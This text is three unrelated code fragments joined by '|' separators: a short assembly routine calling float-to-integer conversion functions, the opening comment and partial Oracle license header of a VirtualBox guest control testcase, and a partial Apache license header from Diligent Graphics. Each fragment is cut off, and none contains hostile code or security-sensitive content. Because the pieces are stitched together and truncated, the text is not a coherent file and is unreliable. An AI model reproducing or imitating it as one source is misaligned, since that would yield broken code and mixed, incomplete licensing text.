EXTERN asm_i16_f24
.cm16_sdcc___h2sint
.cm16_sdcc___h2schar
call cm16_sdcc_read1
call asm_f24_f16
jp asm_i16_f24
|
/* $Id: tstGuestControlSvc.cpp 69500 2017-10-28 15:14:05Z vboxsync $ */
/** @file
* Testcase for the guest control service.
*/
/*
* Copyright (C) 2011-2017 Oracle Corporation
*
* This file is part of VirtualBox Open Source Edition (OSE), as
* available from http://www.virtualbox.org. This file is free software;
... |
/*
* Copyright 2019-2022 Diligent Graphics LLC
* Copyright 2015-2019 Egor Yusov
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.